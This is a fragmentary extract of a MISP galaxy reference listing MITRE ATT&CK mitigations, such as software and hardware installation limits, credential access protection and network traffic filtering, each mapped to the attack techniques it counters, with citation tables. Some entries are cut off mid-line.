The tag is: `misp-galaxy:mitre-course-of-action="Limit Software Installation - M1033"`

Limit Software Installation - M1033 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="VNC - T1021.005"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543"` with estimative-language:likelihood-probability="almost-certain"

Credential Access Protection - M1043

Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

The tag is: `misp-galaxy:mitre-course-of-action="Credential Access Protection - M1043"`

Credential Access Protection - M1043 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"` with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601" with estimative-language:likelihood-probability="almost-certain"

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**Limit Hardware Installation - M1034**

Block users or groups from installing or using unapproved hardware on systems, including USB devices.

The tag is: misp-galaxy:mitre-course-of-action="Limit Hardware Installation - M1034"

Limit Hardware Installation - M1034 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"

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</table>
Path Interception Mitigation - T1034

Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security). Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.

Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations (Citation: Kanthak Sentinel).

Require that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory <code>C:\</code> and system directories, such as <code>C:\Windows\</code>, to reduce places where malicious files could be placed for execution.

Identify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.

The tag is: misp-galaxy:mitre-course-of-action="Path Interception Mitigation - T1034"

Path Interception Mitigation - T1034 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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</table>
Service Execution Mitigation - T1035

Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.

Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Service Execution Mitigation - T1035"

Service Execution Mitigation - T1035 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 4040. Table References

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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</table>

Scheduled Task Mitigation - T1053

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)

Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl</code>. The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)

Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be be configured through GPO: Computer Configuration
> [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)

Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action="Scheduled Task Mitigation - T1053"

Scheduled Task Mitigation - T1053 has relationships with:


**Table 4041. Table References**

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**Account Use Policies - M1036**

Configure features related to account use like login attempt lockouts, specific login times, etc.

The tag is: *misp-galaxy:mitre-course-of-action="Account Use Policies - M1036"

Account Use Policies - M1036 has relationships with:


- mitigates: *misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

- mitigates: *misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"

- mitigates: *misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004" with estimative-
Table 4042. Table References

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<td><a href="https://attack.mitre.org/mitigations/M1036">https://attack.mitre.org/mitigations/M1036</a></td>
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</table>

**Filter Network Traffic - M1037**

Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The tag is: `misp-galaxy:mitre-course-of-action="Filter Network Traffic - M1037"`

Filter Network Traffic - M1037 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171"` with estimative-language:likelihood-probability="almost-certain"
- mitigates: `misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530"` with estimative-language:likelihood-probability="almost-certain"
• mitigates: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Direct Network Flood - T1498.001" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Reflection Amplification - T1498.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Man-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"


• mitigates: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• mitigates: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-
Logon Scripts Mitigation - T1037

Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating Credential Access techniques and limiting account access and permissions of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Logon Scripts Mitigation - T1037"

Logon Scripts Mitigation - T1037 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"
Environment Variable Permissions - M1039

Prevent modification of environment variables by unauthorized users and groups.

The tag is: misp-galaxy:mitre-course-of-action="Environment Variable Permissions - M1039"

Environment Variable Permissions - M1039 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003" with estimative-language:likelihood-probability="almost-certain"

Table 4045. Table References

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</table>

Process Hollowing Mitigation - T1093

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Hollowing Mitigation - T1093"

Process Hollowing Mitigation - T1093 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093" with estimative-
Restrict Library Loading - M1044

Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Library Loading - M1044"

Restrict Library Loading - M1044 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
etc.) as well as applying appropriate change management to firewall rules and other related system configurations.

The tag is: `misp-galaxy:mitre-course-of-action="Indicator Blocking Mitigation - T1054"`

Indicator Blocking Mitigation - T1054 has relationships with:


Table 4048. Table References

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<td><a href="https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal">https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal</a></td>
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</table>

Software Packing Mitigation - T1045

Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.

Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Software Packing Mitigation - T1045"`

Software Packing Mitigation - T1045 has relationships with:


Table 4049. Table References

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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</table>
Data Staged Mitigation - T1074

Identify system utilities, remote access or third-party tools, users or potentially malicious software that may be used to store compressed or encrypted data in a publicly writeable directory, central location, or commonly used staging directories (e.g. recycle bin) that is indicative of non-standard behavior, and audit and/or block them by using file integrity monitoring tools where appropriate. Consider applying data size limits or blocking file writes of common compression and encryption utilities such as 7zip, RAR, ZIP, or zlib on frequently used staging directories or central locations and monitor attempted violations of those restrictions.

The tag is: misp-galaxy:mitre-course-of-action="Data Staged Mitigation - T1074"

Data Staged Mitigation - T1074 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 4050. Table References

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Environmental Keying Mitigation - T1480

This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.

The tag is: misp-galaxy:mitre-course-of-action="Environmental Keying Mitigation - T1480"

Environmental Keying Mitigation - T1480 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"

Table 4051. Table References

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Do Not Mitigate - M1055

This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.

The tag is: misp-galaxy:mitre-course-of-action="Do Not Mitigate - M1055"

Do Not Mitigate - M1055 has relationships with:

1898
Process Discovery Mitigation - T1057

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Discovery Mitigation - T1057"

Process Discovery Mitigation - T1057 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Account Discovery Mitigation - T1087

Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located <code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators</code>. It can be disabled through GPO: Computer Configuration > [Policies] > Administrative Templates > Windows Components > Credential User Interface: Enumerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)
Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Account Discovery Mitigation - T1087"

Account Discovery Mitigation - T1087 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

**Table 4054. Table References**

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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**Valid Accounts Mitigation - T1078**

Take measures to detect or prevent techniques such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems.

Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized.
Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured.

The tag is: `misp-galaxy:mitre-course-of-action="Valid Accounts Mitigation - T1078"`

Valid Accounts Mitigation - T1078 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"` with estimative-language:likelihood-probability="almost-certain"

**Table 4055. Table References**

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<td><a href="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach">https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA13-175A">https://www.us-cert.gov/ncas/alerts/TA13-175A</a></td>
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**Multilayer Encryption Mitigation - T1079**

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: `misp-galaxy:mitre-course-of-action="Multilayer Encryption Mitigation - T1079"`

Multilayer Encryption Mitigation - T1079 has relationships with:


**Table 4056. Table References**

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<td><a href="https://attack.mitre.org/mitigations/T1079">https://attack.mitre.org/mitigations/T1079</a></td>
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**Modify Registry Mitigation - T1112**

Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to
execute code, like through [Service Registry Permissions Weakness](https://attack.mitre.org/techniques/T1058). Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action="Modify Registry Mitigation - T1112"

Modify Registry Mitigation - T1112 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 4057. Table References

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Authentication Package Mitigation - T1131

Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code>, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: *misp-galaxy:mitre-course-of-action="Authentication Package Mitigation - T1131"

Authentication Package Mitigation - T1131 has relationships with:


Table 4058. Table References

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1902
Screen Capture Mitigation - T1113

Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Screen Capture Mitigation - T1113"

Screen Capture Mitigation - T1113 has relationships with:


Table 4059. Table References

Links

https://attack.mitre.org/mitigations/T1113
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

Email Collection Mitigation - T1114

Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.

Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.

Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)
Email Collection Mitigation - T1114 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

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**Input Prompt Mitigation - T1141**

This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to mitigate. Use user training as a way to bring awareness and raise suspicion for potentially malicious events (ex: Office documents prompting for credentials).

The tag is: misp-galaxy:mitre-course-of-action="Input Prompt Mitigation - T1141"

Input Prompt Mitigation - T1141 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141" with estimative-language:likelihood-probability="almost-certain"

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**Clipboard Data Mitigation - T1115**

Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Clipboard Data Mitigation - T1115"
Clipboard Data Mitigation - T1115 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

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LC_LOAD_DYLIB Addition Mitigation - T1161

Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn't included as part of an update, it should be investigated.

The tag is: misp-galaxy:mitre-course-of-action="LC_LOAD_DYLIB Addition Mitigation - T1161"

LC_LOAD_DYLIB Addition Mitigation - T1161 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"

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Code Signing Mitigation - T1116

Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. (Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)

The tag is: misp-galaxy:mitre-course-of-action="Code Signing Mitigation - T1116"

Code Signing Mitigation - T1116 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-
Automated Collection Mitigation - T1119

Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. A keylogger installed on a system may be able to intercept passwords through [Input Capture](https://attack.mitre.org/techniques/T1056) and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: *misp-galaxy:mitre-course-of-action="Automated Collection Mitigation - T1119"

Automated Collection Mitigation - T1119 has relationships with:

Template Injection Mitigation - T1221

Consider disabling Microsoft Office macros/active content to prevent the execution of malicious payloads in documents (Citation: Microsoft Disable Macros), though this setting may not mitigate the [Forced Authentication](https://attack.mitre.org/techniques/T1187) use for this technique.

Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations including training users to identify social engineering techniques and spearphishing emails. Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads. (Citation: Anomali Template Injection MAR 2018)

The tag is: `misp-galaxy:mitre-course-of-action="Template Injection Mitigation - T1221"`

Template Injection Mitigation - T1221 has relationships with:


Table 4066. Table References

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<td><a href="https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6">https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6</a></td>
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Audio Capture Mitigation - T1123

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: `misp-galaxy:mitre-course-of-action="Audio Capture Mitigation - T1123"`

Audio Capture Mitigation - T1123 has relationships with:


Table 4067. Table References
Data Encoding Mitigation - T1132

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Encoding Mitigation - T1132"

Data Encoding Mitigation - T1132 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 4068. Table References

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Video Capture Mitigation - T1125

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to capture video and images by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Video Capture Mitigation - T1125"

Video Capture Mitigation - T1125 has relationships with:
• mitigates: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

Table 4069. Table References

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Login Item Mitigation - T1162

Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).

The tag is: misp-galaxy:mitre-course-of-action="Login Item Mitigation - T1162"

Login Item Mitigation - T1162 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"

Table 4070. Table References

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Domain Fronting Mitigation - T1172

If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.

In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.

The tag is: misp-galaxy:mitre-course-of-action="Domain Fronting Mitigation - T1172"

Domain Fronting Mitigation - T1172 has relationships with:
• mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-
  language:likelihood-probability="almost-certain"

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<td><a href="http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016">http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016</a></td>
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**AppCert DLLs Mitigation - T1182**

Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: *misp-galaxy:mitre-course-of-action="AppCert DLLs Mitigation - T1182"*

AppCert DLLs Mitigation - T1182 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182" with estimative-
  language:likelihood-probability="almost-certain"

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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**Spearphishing Link Mitigation - T1192**

Because this technique involves user interaction on the endpoint, it's difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Other mitigations can take place as [User Execution](https://attack.mitre.org/techniques/T1204) occurs.

The tag is: *misp-galaxy:mitre-course-of-action="Spearphishing Link Mitigation - T1192"*

Spearphishing Link Mitigation - T1192 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-
Hidden Window Mitigation - T1143

Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.

The tag is: `misp-galaxy:mitre-course-of-action="Hidden Window Mitigation - T1143"`

Hidden Window Mitigation - T1143 has relationships with:

- mitigates: `misp-galaxy:mitre-attack-pattern="Hidden Window - T1143"` with estimative-language:likelihood-probability="almost-certain"

Create Account Mitigation - T1136

